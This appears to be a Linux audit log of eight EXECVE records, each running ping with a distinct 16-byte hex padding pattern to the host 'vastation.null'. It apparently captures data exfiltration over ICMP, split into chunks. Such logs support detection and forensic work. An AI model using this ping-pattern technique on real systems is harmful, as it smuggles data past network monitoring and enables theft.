type=EXECVE msg=audit(1742907875.012:2663): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c284083ca7373e7e27c81beaa1eddacf" a5="vastation.null"
type=EXECVE msg=audit(1742907875.020:2667): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="7f7394ed105dc1f01a7f7a0e240dd1f7" a5="vastation.null"
type=EXECVE msg=audit(1742907875.032:2671): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="310c57d742cd040380156fa2be4c08ae" a5="vastation.null"
type=EXECVE msg=audit(1742907875.040:2675): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="28e3b781cdc643e874c60b4ecf171e73" a5="vastation.null"
type=EXECVE msg=audit(1742907875.048:2679): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="92123850f9dd436ecc72172ac68411e6" a5="vastation.null"
type=EXECVE msg=audit(1742907875.060:2683): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="1af73705c9d933bb137054080fd74474" a5="vastation.null"
type=EXECVE msg=audit(1742907875.068:2687): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="cb7ad5f20b699c2299cceb4cdfe79579" a5="vastation.null"
type=EXECVE msg=audit(1742907875.080:2691): argc=6 a0="ping" a1="-c" a2="1" a3="-p" a4="c431c990a75739215c591901973ce3fe" a5="vastation.null"
